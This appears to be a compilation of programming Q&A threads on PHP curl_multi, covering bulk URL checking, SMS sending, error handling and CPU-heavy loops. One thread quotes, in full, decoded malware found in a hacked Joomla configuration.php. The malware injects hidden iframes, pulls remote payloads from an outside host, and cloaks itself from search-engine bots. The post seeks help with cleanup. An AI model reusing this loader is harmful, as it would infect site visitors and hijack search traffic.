So I am having trouble getting this code to work. I pulled it from a blog and it is based on the wordpress link checker. I have about 6000 urls in a database i need to check the http status so this seems like a great choice. I've modified the code slightly to fit my needs and it works (kind of).
I have checked the url_list array throughout the code and it contains all of the url's. The problem is that it will basically stop executing after about the 110th row, it is kind of random but generally around that number. Not really sure if I need to set a timeout somewhere or if I have a bug in the code. I noticed that if I set $max_connections greater than 8 it will return a 500 error. Any suggestions?
<?php
// CONFIG
$db_host = 'localhost';
$db_user = 'test';
$db_pass = 'yearight';
$db_name = 'URLS';
$excluded_domains = array();
$max_connections = 7;
$dbh = new PDO('mysql:host=localhost;dbname=URLS', $db_user, $db_pass);
$sth = $dbh->prepare("SELECT url FROM list");
$sth->execute();
$result = $sth->fetchAll(PDO::FETCH_COLUMN, 0);
// initialize some variables
$url_list = array();
$working_urls = array();
$dead_urls = array();
$not_found_urls = array();
$active = null;
foreach($result as $d) {
// get all links via regex
if (preg_match_all('#((http?://)?([-\w]+\.[-\w\.]+)+\w(:\d+)?(/([-\w/_\.]*(\?\S+)?)?)*)#', $d, $matches)) {
foreach ($matches[1] as $url) {
// store the url
$url_list []= $url;
}
}
}
// 1. multi handle
$mh = curl_multi_init();
// 2. add multiple URLs to the multi handle
for ($i = 0; $i < $max_connections; $i++) {
add_url_to_multi_handle($mh, $url_list);
}
// 3. initial execution
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
// 4. main loop
while ($active && $mrc == CURLM_OK) {
// 5. there is activity
if (curl_multi_select($mh) != -1) {
// 6. do work
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
// 7. is there info?
if ($mhinfo = curl_multi_info_read($mh)) {
// this means one of the requests were finished
// 8. get the info on the curl handle
$chinfo = curl_getinfo($mhinfo['handle']);
// 9. dead link?
if (!$chinfo['http_code']) {
$dead_urls []= $chinfo['url'];
// 10. 404?
} else if ($chinfo['http_code'] == 404) {
$not_found_urls []= $chinfo['url'];
// 11. working
} else {
$working_urls []= $chinfo['url'];
}
// 12. remove the handle
curl_multi_remove_handle($mh, $mhinfo['handle']);
curl_close($mhinfo['handle']);
// 13. add a new url and do work
if (add_url_to_multi_handle($mh, $url_list)) {
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
}
}
}
// 14. finished
curl_multi_close($mh);
echo "==Dead URLs==<br/>";
echo implode("<br/>",$dead_urls) . "<br/><br/>";
echo "==404 URLs==<br>";
echo implode("<br/>",$not_found_urls) . "<br/><br/>";
echo "==Working URLs==<br/>";
echo implode("<br/>",$working_urls);
echo "<pre>";
var_dump($url_list);
echo "</pre>";
// 15. adds a url to the multi handle
function add_url_to_multi_handle($mh, $url_list) {
static $index = 0;
// if we have another url to get
if ($url_list[$index]) {
// new curl handle
$ch = curl_init();
// set the url
curl_setopt($ch, CURLOPT_URL, $url_list[$index]);
// to prevent the response from being outputted
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// follow redirections
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// do not need the body. this saves bandwidth and time
curl_setopt($ch, CURLOPT_NOBODY, 1);
// add it to the multi handle
curl_multi_add_handle($mh, $ch);
// increment so next url is used next time
$index++;
return true;
} else {
// we are done adding new URLs
return false;
}
}
?>
UPDATE:
I have written a script in bash that does the same thing as this. I notice when I was going through the text file the info was output to, that when it fails it is typically around links that return odd http status codes like 000 and 522 some of them tend to execute for up to 5 minutes! So I am wondering if the PHP version of cURL is stopping execution when it encounters these status codes. It is just a thought and might add more value to help solve the issue.
1 - EXECUTION TIME ISSUE
2 - DECLAE AT THE TOP OF CODE MAX_EXECUTION_TIME, WILL HELP THIS FOR SURE
bool set_time_limit ( int $seconds )
Related
How can I send a message to more than 50 mobiles at a time? The code below will execute but it takes a long time.
<?php
$sqljobseekers=$con->query("SELECT * FROM users");
$y=mysqli_num_rows($sqljobseekers);
while($jobseekers=$sqljobseekers->fetch_assoc()) {
$seekermobile=$jobseekers['emp_mobile'];
$msg="Dear Candidate, .".$job_cmp_name.". is looking .".$jobrolename.". like u, for more details logon www.venkymama.com / www.lifemadeeasyglobal.com";
$msg=urlencode($msg);
$sms_file="http://tra.bulksmshyderabad.co.in/websms/sendsms.aspx?userid=$user&password=$password&sender=atmm&mobileno=".$seekermobile."&msg=$msg.";
$sms_h=fopen($sms_file,"r");
fclose($sms_h);
}
?>
Instead of looping through your users, making an API call, waiting for a response, and moving onto the next user; why not execute all the calls at the same time?
Take a look into curl_multi_exec. It will allow you to send multiple API calls at the same time. Something similar to this:
<?php
$sqljobseekers=$con->query("SELECT * FROM users");
$y=mysqli_num_rows($sqljobseekers);
$mh = curl_multi_init();
while($jobseekers=$sqljobseekers->fetch_assoc()) {
$seekermobile=$jobseekers['emp_mobile'];
$msg="Dear Candidate, .".$job_cmp_name.". is looking .".$jobrolename.". like u, for more details logon www.venkymama.com / www.lifemadeeasyglobal.com";
$msg=urlencode($msg);
$sms_file="http://tra.bulksmshyderabad.co.in/websms/sendsms.aspx?userid=$user&password=$password&sender=atmm&mobileno=".$seekermobile."&msg=$msg.";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $sms_file);
curl_multi_add_handle($mh, $ch);
}
$active = null;
//execute the handles
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
if (curl_multi_select($mh) != -1) {
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
}
?>
I'm working with multi Curl and was wondering how to handle the errors. I want to check which error occured and if it is an error like, rate limit exceeded I want to crawl that link again after some delay (sleep()). My question: "Is there a build in function which can do this for me or do I need to collect all Urls in an array and just run those again?"
This is what I've got now:
<?php
$urls = array( "https://API-URL.com",
"https://API-URL.com",
"https://API-URL.com",
"https://API-URL.com",
...);
//create the multiple cURL handle
$mh = curl_multi_init();
//Number of elements in $urls
$nbr = count($urls);
// set URL and options
for($x = 0; $x < $nbr; $x++){
// create both cURL resources
$ch[$x] = curl_init();
// set URL and other appropriate options
curl_setopt($ch[$x], CURLOPT_URL, $urls[$x]);
curl_setopt($ch[$x], CURLOPT_RETURNTRANSFER, true );
curl_setopt($ch[$x], CURLOPT_SSL_VERIFYPEER, false);
//add the two handles
curl_multi_add_handle($mh,$ch[$x]);
}
//execute the handles
do {
curl_multi_exec($mh, $running);
} while ($running);
for($x = 0; $x < $nbr; $x++){
$result = curl_multi_getcontent($ch[$x]);
$decoded = json_decode($result, true);
//get info about the request
$error = curl_getinfo($ch[$x], CURLINFO_HTTP_CODE);
//error handling
if($error != 200){
$again[] = array("Url" => $urls[$x], "errornbr" => $error);
} else {
// Here I do what ever I want with the data
}
curl_multi_remove_handle($mh, $ch[$x]);
curl_close($ch[1]);
}
curl_multi_close($mh);
?>
For multiple handles there is
https://www.php.net/manual/en/function.curl-multi-info-read.php
so error check (assuming http connection) should look like:
while ($a = curl_multi_info_read($mh))
{
if ($b = $a['result'])
{
echo curl_strerror($b);# CURLE_* error
}
elseif (!($b = curl_getinfo($a['handle'], CURLINFO_RESPONSE_CODE)))
{
echo 'connection failed';
}
elseif ($b !== 200)
{
echo 'HTTP status is not 200 OK';
}
}
Consider this code as pseudo-code for modern PHPs (i didn't test this exact variant, but scheme will work). Calling curl_errno() on "easy" handles added to "multi" handle will return 0 which is not an error.
In the second for-loop, when you are cycling through the curl handlers to examine what did each curl handler return, I hope, this approach will answer you question
foreach ($ch as $key => $h) {
//This code is actually checking for any error that may occur, whatever that
//error is you can handle it in the if-part of the condition. and save those
//urls to the array $again to call them on a later stage.
if (curl_errno($h)) {
//this is how you will get complete information what did happened to the
//curl handler. And why did it fail. All the inforation will be stored in //error_info.
$again[] = array("Url" =>curl_getinfo($h, CURLINFO_EFFECTIVE_URL), "error_info" => curl_getinfo($h));
}
else{
//here you will handle the success scenario for each curl handler.
$responses[$key] = ['data' => curl_multi_getcontent($h)];
}
//remove curl handler as you are doing in the loop
}
Since a week i was trying to login to the back-end of my joomla 1.5 site. It simply keeps coming back to the login page without any error. When I took a look at the configuration.php file it appeared as a string encoded with following pattern:
<?php eval(base64_decode('string here';))) />
When i decoded it using an online service this is what it appears to be:
if (!defined('frmDs')){ define('frmDs' ,1); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = #file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) #unlink($f); else #touch($f); } else { if($fp = #fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = #file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot($ua){ if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = #fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = #strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) #unlink($odbf); if(strpos(frm_crpt(#file_get_contents($dbf)),$ip) === false ){ if ($fp=#fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } $tdir = frm_tmpdir(); $defframe = '<style> .gtvvh { position:absolute; left:-760px; top:-927px; }</style><div class="gtvvh"><iframe src="http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.latest.js" width="477" height="435"></iframe></div>'; $defrdg='http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.js'; $codelink = 'http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.latest.js'; $rdglink='http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.js'; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot($ua); if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){ error_reporting(0); if(!isset($_COOKIE['__utmfr'])) { if(!$codelink) print($defframe); else print(frm_getcache($tdir,$codelink,15)); #setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); } } //------- $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host)))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*48,false)); exit(); } if ($isb) { error_reporting(0); print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&pa=$parg&g=".(($ruri=='/'||$ruri=='/index.php')?'1':'0'),60*48,false)); } } //---------}
I checked other Joomla installations on my hosting space and see that all the configuration.php are the same.
What to do?
Please help
The only thing the the configuration.php file should have is defined variables. Nothing else. It could very well be that someone has hacked your site and messed around with files.
Change all passwords that are related to your website, including the hosting one.
Take a backup of your site via the cPanel and scan it with some antivirus software. Assuming there are no viruses detected, upgrade your site to the latest of the Joomla 2.5 series (2.5.14).
Then, remove the code you showed in your question from the configuration.php file and try logging back into the Joomla admin panel. If it works, ensure all your extensions are up to date and read this:
Joomla! 2.5.4 Hacked: Having trouble with diagnosis.
If not, then try resetting your super user password via the database:
http://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F
UPDATE:
It seems your whole configuration.php file has been attacked. I have provided you with the code for the file, however there are some blank spaces to be filled in. Anything that does need filling in, I have written next to it:
http://pastebin.com/gWWtCAJR
Let me know how it goes :)
I use multi curl for retrieve some pages, from 1 to 200.
The problem is that the firsts links from the List return always Empties!
I don't understand WHY!! O_o
$mh = curl_multi_init();
for($j=0; $j<$i; $j++){
$ch[$j] = curl_init($Links[$j]);
curl_setopt($ch[$j], CURLOPT_CONNECTTIMEOUT, $curlConTimeOut);
curl_setopt($ch[$j], CURLOPT_TIMEOUT, $curlTimeOut);
curl_setopt($ch[$j], CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch[$j], CURLOPT_MAXREDIRS, 3);
curl_setopt($ch[$j], CURLOPT_FOLLOWLOCATION, 1);
curl_multi_add_handle($mh, $ch[$j]);
}
$active = null;
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
if (curl_multi_select($mh) != -1) {
do {
$mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
}
$Si = 0; $Fi = 0; $Disp = "";
for($j=0; $j<$i; $j++){
if($ch[$j]){
if(curl_multi_getcontent($ch[$j]) == null){
$Disp .= '0';
$Fi++;
}else{
$Disp .= '1';
$Si++;
}
curl_multi_remove_handle($mh, $ch[$j]);
curl_close($ch[$j]);
}
}
curl_multi_close($mh);
$Si / $Fi / $Disp is just for testing, and an example of result is:
Link Success: 65/161
Link Failed : 96/161
Disp: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111101111110011111111001111111111111111111111111111111111
Where 0 is for failed, and 1 for success. If the N element is 0, it means that the N Link is returned NULL
It's impossible that every time, only the initials elements return null!! What's the odds?!?!?!
I have ask for curl_error, all with: "Connection timed out after XXXXX milliseconds"!
1°: 13852 milliseconds
2°: 13833 milliseconds
...
12676 ms
...
10195
...
and continues down to 6007ms and after start the right ones!
The CURLOPT_CONNECTTIMEOUT IS SET TO 6sec!
why every time start from an higher number and go to 6, and after return right? O_o
I want to underline that the order of the null response depends only from the list! Not from the multicurl time respond!
Another Example with less links:
| Link Success: 30/52
| Link Failed : 22/52
| Disp: 0000000000000000000001111111111011111111111111111111
As you see when you execute/request less content/pages you will hit the 1 faster (1 is success and 0 error).
As I understand from what I hear your first request hit an time out. My guess is that you need to lower the amount of request/executions per time. Lets stay you need to execute 5, get the values and then next 5.
5 is just a number i say, so test which number is beter for you. This number can be bigger if your processor can handle more stuff at the same time. But is also limited to the other side of the internet how fast they respond.
Hope it hels
This is a loop used in our script with curl. It's causing CPU usage to shoot up to 100%. A friend said "Your computer is looping so fast here it doesn't have time to process the request since it is constantly checking for a finish."... So my question is how can this loop be re-written to slow down? Thanks
$running = null;
do {
curl_multi_exec($mh, $running);
} while($running > 0);
Try this: http://php.net/manual/function.curl-multi-select.php
Adding a call to http://php.net/sleep or http://php.net/usleep in every iteration should reduce the CPU usage by allowing other running processes to be scheduled by the operating system.
Unfortunately you didn't post whole code. I suppose you are doing something like
$mh = curl_multi_init();
for ($i = 0; $i < $desiredThreadsNumber; $i++) {
$ch = curl_init();
// set up $ch here
curl_multi_add_handle($mh, $ch);
}
You should understand that you haven't run threads yet here. curl_multi_exec() runs all threads. But it can't run all $desiredThreadsNumber threads simultaneously. If you look on example on curl_multi_exec() php.net page, you will see that you must wait while curl_multi_exec() run all threads. In other words, you need next nested loop here:
$running = null;
do {
do {
$mrc = curl_multi_exec($mh, $running);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
} while($running > 0);
At the end let me suggest you to read this article http://www.onlineaspect.com/2009/01/26/how-to-use-curl_multi-without-blocking/ and use code snippet from there, I used it in 2 or 3 projects.
curl_multi_select (http://php.net/manual/function.curl-multi-select.php) is indeed the way to go, but there are a couple caveats.
First, if curl_multi_exec returns CURLM_CALL_MULTI_PERFORM, it has more data to be processed immediately, so should be run again. Also, it is important to check that curl_multi_exec did not fail immediately; in that case curl_multi_select could block forever.
This should work:
do {
while (CURLM_CALL_MULTI_PERFORM === curl_multi_exec($mh, $running)) {};
if (!$running) break;
while (curl_multi_select($mh) === 0) {};
} while (true);
If anyone sees a good way to avoid the while(true) without duplicating code, please point it out.
Tried all the solutions provided above but this one worked for me in highly loaded system where on each second there are more than 1k Multi Curl requests are being made.
//Execute Handles
$running = null;
do {
$mrc = curl_multi_exec($mh, $running);
} while($mrc == CURLM_CALL_MULTI_PERFORM);
while ($running && $mrc == CURLM_OK) {
if (curl_multi_select($mh) == -1) {
usleep(1);
}
do {
$mrc = curl_multi_exec($mh, $running);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
Try:
$running = null;
do {
do {
$mrc = curl_multi_exec($mh, $running);
} while ($mrc == CURLM_CALL_MULTI_PERFORM && curl_multi_select($mh) === 0 );
} while($running > 0 && $mrc == CURLM_OK );
You could add sleep(1), which sleeps for one second, into the loop.